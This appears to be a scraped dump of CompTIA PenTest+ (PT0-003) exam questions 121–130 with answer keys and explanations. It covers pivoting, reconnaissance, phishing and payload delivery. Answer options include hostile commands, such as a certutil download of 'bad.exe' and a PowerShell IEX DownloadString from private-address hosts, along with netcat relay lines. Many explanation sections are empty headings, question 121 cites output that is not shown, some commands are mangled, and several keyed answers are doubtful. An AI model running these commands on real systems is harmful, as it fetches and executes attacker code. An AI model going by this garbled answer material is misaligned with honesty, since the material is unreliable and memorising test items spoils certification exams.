CompTIA CompTIA Certifications PT0-003 Questions & Answers

• Question 121:

  A penetration tester needs to evaluate the order in which the next systems will be selected for testing. Given the following output: Which of the following targets should the tester select next?

  

  A. fileserver

  B. hrdatabase

  C. legaldatabase

  D. financesite

  Correct Answer: A

  Evaluation Criteria:

  Analysis:

  Selection Justification:

  Pentest References:

  Risk Prioritization: Balancing between severity (CVSS) and exploitability (EPSS) is crucial for effective vulnerability management. Risk Assessment: Evaluating both the impact and the likelihood of exploitation helps in making informed

  decisions about testing priorities. By selecting the fileserver, the penetration tester focuses on a target that is highly likely to be exploited, addressing the most immediate risk based on the given scores.

  Top of Form

  Bottom of Form

• Question 122:

  During a penetration test, a junior tester uses Hunter.io for an assessment and plans to review the information that will be collected. Which of the following describes the information the junior tester will receive from the Hunter.io tool?

  A. A collection of email addresses for the target domain that is available on multiple sources on the internet

  B. DNS records for the target domain and subdomains that could be used to increase the external attack surface

  C. Data breach information about the organization that could be used for additional enumeration

  D. Information from the target's main web page that collects usernames, metadata, and possible data exposures

  Correct Answer: A

  Hunter.io is a tool used for finding professional email addresses associated with a domain.

  Here's what it provides:

  Functionality of Hunter.io:

  Comparison with Other Options:

  Hunter.io is specifically designed to collect and validate email addresses for a given domain, making it the correct answer.

• Question 123:

  While conducting a peer review for a recent assessment, a penetration tester finds the debugging mode is still enabled for the production system. Which of the following is most likely responsible for this observation?

  A. Configuration changes were not reverted.

  B. A full backup restoration is required for the server.

  C. The penetration test was not completed on time.

  D. The penetration tester was locked out of the system.

  Correct Answer: A

  Debugging Mode:

  Common Causes:

  Best Practices:

  References from Pentesting Literature:

  References:

  Penetration Testing - A Hands-on Introduction to Hacking HTB Official Writeups

• Question 124:

  As part of a security audit, a penetration tester finds an internal application that accepts unexpected user inputs, leading to the execution of arbitrary commands. Which of the following techniques would the penetration tester most likely use to access the sensitive data?

  A. Logic bomb

  B. SQL injection

  C. Brute-force attack

  D. Cross-site scripting

  Correct Answer: B

  SQL injection (SQLi) is a technique that allows attackers to manipulate SQL queries to execute arbitrary commands on a database. It is one of the most common and effective methods for accessing sensitive data in internal applications that

  accept unexpected user inputs. Here's why option B is the most likely technique:

  Arbitrary Command Execution: The question specifies that the internal application accepts unexpected user inputs leading to arbitrary command execution. SQL injection fits this description as it exploits vulnerabilities in the application's input

  handling to execute unintended SQL commands on the database. Data Access: SQL injection can be used to extract sensitive data from the database, modify or delete records, and perform administrative operations on the database server.

  This makes it a powerful technique for accessing sensitive information.

  Common Vulnerability: SQL injection is a well-known and frequently exploited vulnerability in web applications, making it a likely technique that a penetration tester would use to exploit input handling issues in an internal application.

  References from Pentest:

  Luke HTB: This write-up demonstrates how SQL injection was used to exploit an internal application and access sensitive data. It highlights the process of identifying and leveraging SQL injection vulnerabilities to achieve data extraction.

  Writeup HTB: Describes how SQL injection was utilized to gain access to user credentials and further exploit the application. This example aligns with the scenario of using SQL injection to execute arbitrary commands and access sensitive

  data.

  Conclusion:

  Given the nature of the vulnerability described (accepting unexpected user inputs leading to arbitrary command execution), SQL injection is the most appropriate and likely technique that the penetration tester would use to access sensitive

  data. This method directly targets the input handling mechanism to manipulate SQL queries, making it the best choice.

• Question 125:

  A penetration tester identifies an exposed corporate directory containing first and last names and phone numbers for employees. Which of the following attack techniques would be the most effective to pursue if the penetration tester wants to compromise user accounts?

  A. Smishing

  B. Impersonation

  C. Tailgating

  D. Whaling

  Correct Answer: A

  When a penetration tester identifies an exposed corporate directory containing first and last names and phone numbers, the most effective attack technique to pursue would be smishing. Here's why:

  Understanding Smishing:

  Why Smishing is Effective:

  Alternative Attack Techniques:

• Question 126:

  Which of the following components should a penetration tester include in an assessment report?

  A. User activities

  B. Customer remediation plan

  C. Key management

  D. Attack narrative

  Correct Answer: D

  An attack narrative provides a detailed account of the steps taken during the penetration test, including the methods used, vulnerabilities exploited, and the outcomes of each attack. This helps stakeholders understand the context and

  implications of the findings.

  Components of an Assessment Report:

  Importance of Attack Narrative:

  References from Pentesting Literature:

  Step-by-Step ExplanationReferences:

  Penetration Testing - A Hands-on Introduction to Hacking HTB Official Writeups

• Question 127:

  A penetration tester gains access to a host but does not have access to any type of shell. Which of the following is the best way for the tester to further enumerate the host and the environment in which it resides?

  A. ProxyChains

  B. Netcat

  C. PowerShell ISE

  D. Process IDs

  Correct Answer: B

  If a penetration tester gains access to a host but does not have a shell, the best tool for further enumeration is Netcat. Here's why:

  Netcat:

  Comparison with Other Tools:

  Netcat's ability to perform multiple network-related tasks without needing a shell makes it the best choice for further enumeration.

• Question 128:

  A penetration tester is conducting reconnaissance for an upcoming assessment of a large corporate client. The client authorized spear phishing in the rules of engagement. Which of the following should the tester do first when developing the phishing campaign?

  A. Shoulder surfing

  B. Recon-ng

  C. Social media

  D. Password dumps

  Correct Answer: C

  When developing a phishing campaign, the tester should first use social media to gather information about the targets.

  Social Media:

  Process:

  Other Options:

  Pentest References:

  Spear Phishing: A targeted phishing attack aimed at specific individuals, using personal information to increase the credibility of the email. OSINT (Open Source Intelligence): Leveraging publicly available information to gather intelligence on

  targets, including through social media. By starting with social media, the penetration tester can collect detailed and personalized information about the targets, which is essential for creating an effective spear phishing campaign.

• Question 129:

  A penetration tester established an initial compromise on a host. The tester wants to pivot to other targets and set up an appropriate relay. The tester needs to enumerate through the compromised host as a relay from the tester's machine. Which of the following commands should the tester use to do this task from the tester's host?

  A. attacker_host$ nmap -sT | nc -n 22

  B. attacker_host$ mknod backpipe p attacker_host$ nc -l -p 8000 | 0 80 | tee backpipe

  C. attacker_host$ nc -nlp 8000 | nc -n attacker_host$ nmap -sT 127.0.0.1

  D. attacker_host$ proxychains nmap -sT

  Correct Answer: D

  ProxyChains is a tool that allows you to route your traffic through a chain of proxy servers, which can be used to anonymize your network activity. In this context, it is being used to route Nmap scan traffic through the compromised host,

  allowing the penetration tester to pivot and enumerate other targets within the network.

  Understanding ProxyChains:

  Command Breakdown:

  Setting Up ProxyChains:

  Step-by-Step Explanationplaintext

  Copy code

  socks4 127.0.0.1 1080

  Execution:

  proxychains nmap -sT

  References from Pentesting Literature:

  References:

  Penetration Testing - A Hands-on Introduction to Hacking HTB Official Writeups

• Question 130:

  A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use?

  A. powershell.exe impo C:\tools\foo.ps1

  B. certutil.exe -f https://192.168.0.1/foo.exe bad.exe

  C. powershell.exe -noni -encode IEX.Downloadstring("http://172.16.0.1/")

  D. rundll32.exe c:\path\foo.dll,functName

  Correct Answer: B

  To execute a payload and gain additional access, the penetration tester should use certutil.exe. Here's why:

  Using certutil.exe:

  Comparison with Other Commands:

  Using certutil.exe to download and execute a payload is a common and effective method.